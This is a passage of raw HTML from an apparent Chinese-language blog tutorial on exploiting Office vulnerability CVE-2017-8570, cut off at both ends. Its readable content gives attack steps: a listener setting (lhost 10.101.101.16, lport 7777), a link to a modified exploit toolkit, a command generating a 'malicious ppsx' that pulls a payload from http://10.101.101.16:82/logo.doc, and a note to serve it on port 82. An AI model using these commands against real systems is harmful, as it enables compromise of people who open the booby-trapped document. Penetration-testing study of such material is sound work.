transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">_</span>https&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">lhost</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">10.101.101.16</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">lport</span>&nbsp;<span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">7777</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">force</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">改好的</p><div id="crayon-5c25a60d4f7c3014669356" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 605.6px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7c3014669356-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">exp</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">https</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//github.com/niexinming/safe_tool/blob/master/cve-2017-8570_toolkit.py，</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">用法是：先生成一个恶意的ppsx</p><div id="crayon-5c25a60d4f7c8706613276" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 644px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7c8706613276-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">python</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">cve</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">2017</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">8570_toolkit.py</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">M</span>&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">gen</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">w</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">car</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">ppsx</span>&nbsp;<span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">u</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.16:82/logo.doc</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">在&nbsp;82&nbsp;端口开启服务：</p><div id="crayon-5c25a60d4f7cc617371725" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 599.2px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7cc617371725-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; 